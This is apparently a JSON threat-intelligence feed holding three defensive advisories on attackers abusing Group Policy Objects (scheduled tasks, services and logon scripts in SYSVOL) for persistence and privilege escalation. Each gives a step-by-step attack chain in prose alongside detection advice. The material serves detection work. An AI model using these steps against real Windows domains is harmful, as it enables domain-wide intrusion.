{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/group-policy/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["group-policy","privilege-escalation","persistence","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eAttackers with domain administrator privileges can abuse Group Policy Objects (GPOs) to deploy malicious payloads across a Windows domain. By creating or modifying scheduled tasks or services via GPOs, an attacker can achieve both privilege escalation and persistence. This involves modifying files such as \u003ccode\u003eScheduledTasks.xml\u003c/code\u003e or \u003ccode\u003eServices.xml\u003c/code\u003e within the SYSVOL share. The modifications are replicated to domain-joined machines when the GPO is applied. This technique allows for remote code execution and control over a significant number of systems from a central point, making it a powerful tool for adversaries targeting enterprise environments. The described rule detects file modifications within specific GPO paths, excluding changes made by the \u003ccode\u003edfsrs.exe\u003c/code\u003e process to reduce false positives. The rule is designed to detect suspicious activities related to scheduled tasks and services within Group Policy settings, helping security teams identify and respond to potential threats originating from compromised domain administrator accounts.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains domain administrator privileges through compromised credentials or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eAttacker navigates to the SYSVOL share, typically located at \u003ccode\u003e\\\\\u0026lt;domain\u0026gt;\\SYSVOL\\\u0026lt;domain\u0026gt;\\Policies\\\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eAttacker identifies a GPO to modify or creates a new GPO.\u003c/li\u003e\n\u003cli\u003eAttacker modifies the \u003ccode\u003eScheduledTasks.xml\u003c/code\u003e or \u003ccode\u003eServices.xml\u003c/code\u003e file within the GPO\u0026rsquo;s directory (\u003ccode\u003e\u0026lt;GPO_GUID\u0026gt;\\MACHINE\\Preferences\\ScheduledTasks\\\u003c/code\u003e or \u003ccode\u003e\u0026lt;GPO_GUID\u0026gt;\\MACHINE\\Preferences\\Services\\\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe modified XML file contains instructions to create a scheduled task or service that executes a malicious payload.\u003c/li\u003e\n\u003cli\u003eThe Group Policy Management Console (GPMC) or other tools are used to link the GPO to an organizational unit (OU) containing target computers.\u003c/li\u003e\n\u003cli\u003eTarget machines within the OU receive the updated GPO settings during the next Group Policy refresh cycle (or forced via \u003ccode\u003egpupdate /force\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe scheduled task or service is created on the target machine, executing the attacker\u0026rsquo;s malicious payload and achieving persistence or privilege escalation.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to widespread compromise across the domain. Attackers can execute arbitrary code on numerous systems, potentially leading to data exfiltration, ransomware deployment, or disruption of critical services. The impact can range from minor inconveniences to complete operational shutdown, depending on the nature of the malicious payload and the attacker\u0026rsquo;s objectives. Without proper detection and response mechanisms, such attacks can persist for extended periods, causing significant damage to the organization.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect GPO Scheduled Task/Service Modification via File Event\u003c/code\u003e to detect unauthorized modifications to \u003ccode\u003eScheduledTasks.xml\u003c/code\u003e and \u003ccode\u003eServices.xml\u003c/code\u003e files within GPO paths.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon file creation and modification logging to provide the necessary data for the Sigma rules to function effectively.\u003c/li\u003e\n\u003cli\u003eReview and harden GPO management access controls to limit the potential for abuse by compromised accounts, based on the observed T1484.001 technique.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the deployed rules, focusing on the user accounts and processes involved in the file modifications as described in the overview.\u003c/li\u003e\n\u003cli\u003eMonitor for process execution from unusual locations based on service creation or scheduled task as described in the TTPs.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-gpo-scheduled-task-modification/","summary":"Detection of the creation or modification of new Group Policy based scheduled tasks or services, which can be abused by attackers with domain admin permissions to execute malicious payloads remotely on domain-joined machines, leading to privilege escalation and persistence.","title":"GPO Scheduled Task or Service Creation/Modification","url":"https://feed.craftedsignal.io/briefs/2024-01-gpo-scheduled-task-modification/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["group-policy","scheduled-task","privilege-escalation","lateral-movement"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eAttackers can abuse Group Policy Objects (GPOs) to execute scheduled tasks at scale, compromising objects controlled by a given GPO. This involves modifying the contents of the \u003ccode\u003e\u0026lt;GPOPath\u0026gt;\\\\Machine\\\\Preferences\\\\ScheduledTasks\\\\ScheduledTasks.xml\u003c/code\u003e file. By altering the XML file to include malicious commands, attackers can achieve privilege escalation or lateral movement within the domain. This technique leverages a legitimate Active Directory mechanism, making it essential to differentiate between authorized administrative actions and malicious activities. The modification can be identified through changes to \u003ccode\u003egPCMachineExtensionNames\u003c/code\u003e or \u003ccode\u003egPCUserExtensionNames\u003c/code\u003e attributes within Active Directory.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to a system with permissions to modify GPOs.\u003c/li\u003e\n\u003cli\u003eAttacker modifies the \u003ccode\u003eScheduledTasks.xml\u003c/code\u003e file within the SYSVOL share of a targeted GPO (\u003ccode\u003e\\\\\\\\*\\\\SYSVOL\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker changes the contents of the XML file to include a malicious \u003ccode\u003e\u0026lt;Command\u0026gt;\u003c/code\u003e and \u003ccode\u003e\u0026lt;Arguments\u0026gt;\u003c/code\u003e tag.\u003c/li\u003e\n\u003cli\u003eThe modified GPO is replicated to domain controllers.\u003c/li\u003e\n\u003cli\u003eTarget systems receive the updated GPO during regular group policy refresh cycles.\u003c/li\u003e\n\u003cli\u003eThe scheduled task defined in the modified \u003ccode\u003eScheduledTasks.xml\u003c/code\u003e is executed on the target systems.\u003c/li\u003e\n\u003cli\u003eThe malicious command executes, potentially escalating privileges or facilitating lateral movement.\u003c/li\u003e\n\u003cli\u003eAttacker achieves desired objective, such as installing malware, creating new accounts, or exfiltrating data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code on systems managed by the modified GPO. The scope of impact depends on the targeted GPO and the permissions of the scheduled task. This can lead to widespread compromise, affecting numerous systems and users within the domain. The modification of GPOs can be difficult to detect without proper monitoring, potentially allowing attackers to maintain persistence and control over the environment.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable and monitor Windows audit policies for \u0026ldquo;Audit Directory Service Changes\u0026rdquo; and \u0026ldquo;Audit Detailed File Share\u0026rdquo; to detect modifications to GPOs and file share access, as outlined in the \u003ca href=\"#setup\"\u003esetup\u003c/a\u003e section.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Scheduled Task Execution via GPO Attribute Modification\u0026rdquo; to detect modifications to the \u003ccode\u003egPCMachineExtensionNames\u003c/code\u003e or \u003ccode\u003egPCUserExtensionNames\u003c/code\u003e attributes (rule: \u003ccode\u003eScheduled Task Execution via GPO Attribute Modification\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Scheduled Task XML File Modification in SYSVOL\u0026rdquo; to detect modifications to the ScheduledTasks.xml file in SYSVOL shares (rule: \u003ccode\u003eScheduled Task XML File Modification in SYSVOL\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eReview and validate any changes to GPOs, specifically those related to scheduled tasks, to ensure they are authorized and legitimate.\u003c/li\u003e\n\u003cli\u003eMonitor for the execution of unexpected or malicious commands originating from scheduled tasks created or modified via GPOs.\u003c/li\u003e\n\u003cli\u003eRegularly audit and review GPO configurations to identify any potential weaknesses or misconfigurations that could be exploited.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-gpo-scheduled-task-abuse/","summary":"Attackers abuse Group Policy Objects by modifying scheduled task attributes to execute malicious commands across objects controlled by the GPO, potentially leading to privilege escalation and lateral movement.","title":"GPO Scheduled Task Abuse for Privilege Escalation and Lateral Movement","url":"https://feed.craftedsignal.io/briefs/2024-01-gpo-scheduled-task-abuse/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["group-policy","privilege-escalation","persistence","windows"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eAttackers may abuse Group Policy Objects (GPOs) to execute malicious commands at startup, logon, shutdown, and logoff by modifying the \u003ccode\u003escripts.ini\u003c/code\u003e or \u003ccode\u003epsscripts.ini\u003c/code\u003e files. This involves adding or modifying these files within the \u003ccode\u003e\u0026lt;GPOPath\u0026gt;\\\\Machine\\\\Scripts\\\\\u003c/code\u003e or \u003ccode\u003e\u0026lt;GPOPath\u0026gt;\\\\User\\\\Scripts\\\\\u003c/code\u003e directories. Such modifications can lead to privilege escalation by running commands with elevated privileges when users log on or systems start. Successful exploitation allows the attacker to maintain persistent access and control over the targeted systems within the Active Directory environment. This activity is often used in post-exploitation scenarios after initial access has been gained through other means, such as phishing or exploiting vulnerabilities. The goal is to achieve widespread command execution across multiple systems within the domain.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system with sufficient privileges to modify GPOs, often through compromised credentials or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker identifies a target GPO to modify, typically one that applies to a large number of users or computers.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies either the \u003ccode\u003escripts.ini\u003c/code\u003e or \u003ccode\u003epsscripts.ini\u003c/code\u003e file within the \u003ccode\u003eMachine\\\\Scripts\u003c/code\u003e or \u003ccode\u003eUser\\\\Scripts\u003c/code\u003e directory of the targeted GPO.\u003c/li\u003e\n\u003cli\u003eThe modification involves adding a new script entry or modifying an existing one to point to a malicious script or command. This script can be a batch file, PowerShell script, or executable.\u003c/li\u003e\n\u003cli\u003eThe attacker links the GPO to an Organizational Unit (OU) containing the target computers or users, or modifies the existing GPO link.\u003c/li\u003e\n\u003cli\u003eWhen targeted users log on or computers start up, the GPO settings are applied, and the malicious script is executed.\u003c/li\u003e\n\u003cli\u003eThe malicious script performs actions such as installing malware, adding user accounts with elevated privileges, or modifying system configurations.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves persistence and/or elevated privileges across the targeted systems, enabling further malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary commands with elevated privileges across numerous systems within the targeted domain. This can result in widespread malware infection, data theft, or complete system compromise. The impact can range from operational disruption to significant financial loss and reputational damage, affecting potentially hundreds or thousands of machines. Since this attack leverages legitimate Active Directory functionalities, detection can be challenging without proper monitoring and alerting mechanisms in place.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable \u0026ldquo;Audit Directory Service Changes\u0026rdquo; and \u0026ldquo;Audit Detailed File Share\u0026rdquo; Windows audit policies to generate the events required for detection, as described in the \u003ca href=\"https://ela.st/audit-directory-service-changes\"\u003esetup instructions\u003c/a\u003e and \u003ca href=\"https://ela.st/audit-detailed-file-share\"\u003eaudit detailed file share instructions\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect GPO Modification for Startup/Logon Scripts\u0026rdquo; to your SIEM to detect modifications to GPOs that add or modify startup/logon scripts.\u003c/li\u003e\n\u003cli\u003eMonitor Windows Security Event Logs for Event IDs 5136 and 5145 related to GPO modifications.\u003c/li\u003e\n\u003cli\u003eRegularly review GPO settings to identify any unauthorized or suspicious scripts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-gpo-ini-script-modification/","summary":"This rule detects the modification of Group Policy Objects (GPO) to add a startup or logon script to user or computer objects, enabling attackers to achieve privilege escalation and persistence by executing arbitrary commands at scale.","title":"GPO Modification to Add Startup/Logon Scripts","url":"https://feed.craftedsignal.io/briefs/2024-01-gpo-ini-script-modification/"}],"language":"en","title":"CraftedSignal Threat Feed — Group-Policy","version":"https://jsonfeed.org/version/1.1"}